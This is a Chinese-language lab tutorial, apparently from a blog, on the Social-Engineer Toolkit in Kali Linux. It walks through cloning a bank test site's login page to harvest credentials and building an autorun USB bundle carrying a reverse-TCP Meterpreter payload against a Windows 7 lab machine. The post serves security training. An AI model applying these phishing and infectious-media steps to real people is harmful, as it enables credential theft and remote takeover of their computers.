赞
踩
目录
3.选择攻击模块Standard Metasploit Executable
4.选择Windows Reverse_TCP Meterpreter and send back to attacker
9.在tmp创建tex.t目录,把payload.exe和autorun.inf存放在此
社会工程学是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗等危害手段取得自身利益的手法,是通过研究受害者心理,并以此诱使受害者做出配合,从而达到自身目的的方法。
命令:
setoolkit
(1)Social-Engineering Attacks(社会工程学攻击)
(2)Penetration Testing (Fast-Track)(渗透测试)
(3)Third Party Modules(第三方模块)
(4)Update the Social-Engineer Toolkit(升级软件)
(5)Update SET configuration(升级SET配置)
(6)Help, Credits, and About(帮助)
(99)Exit the Social-Engineer Toolkit(退出)
(1)Spear-Phishing Attack Vectors(鱼叉式钓鱼攻击向量)
(2)Website Attack Vectors(网站攻击向量)
(3)Infectious Media Generator(媒介感染攻击)
(4)Create a Payload and Listener (创建Payload和Listener)
(5)Mass Mailer Attack(海量邮件攻击)
(6)Arduino-Based Attack Vector (基于Arduino的攻击向量)
(7)Wireless Access Point Attack Vector(无线热点攻击向量)
(8)QRCode Generator Attack Vectors(二维码攻击向量)
(9)Powershell Attack Vector(powershell 攻击向量)
(10)Third Party Modules(第三方模块)
(99)Return back to the main menu(返回主菜单)
测试目标单位的用户是否会严格遵守管理协议,是否对来历不明的地址做了充分防御。
菜单: Social-Engineering Attacks / Website Attack Vectors/Credential Harvester Attack Method
实验环境:填写如下IP地址
Kali 2主机IP: 192.168.151.128
靶机(32位Windows7)的IP: 192.168.151.129
Web Templates(网站模块)
Site Cloner(网站克隆)---- 选择这种方式!
Custom Import(自定义导入)
(Kali本机)
(IBM的测试网站:www.testfire.net/bank/login.aspx)
www.testfire.net/bank/login.aspx
结果:成功启动了伪造好的网站服务器
(填写用户名(amiliya)和密码(123456)之后,单击“Login”提交)
已经跳转了。
用户名和密码已被获取。
菜单: Social-Engineering Attacks / Infectious Media Generator
实验环境:填写如下IP地址
Kali 2主机IP: 192.168.151.128
靶机 32位Windows7 的IP: 192.168.151.129
命令:cp -r /root/.set/autorun/* /tmp/text
cp -r /root/.set/autorun/* /tmp/text
命令:cp -r /root/.set/payload.exe /tmp/text
cp -r /root/.set/payload.exe /tmp/text
命令:
mkdir lzzy
可以看到lzzy文件目录已被删除,本次攻击成功。
本次实验简单介绍了社会工程学、用户名和密码窃取与自动播放文件攻击的方法。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。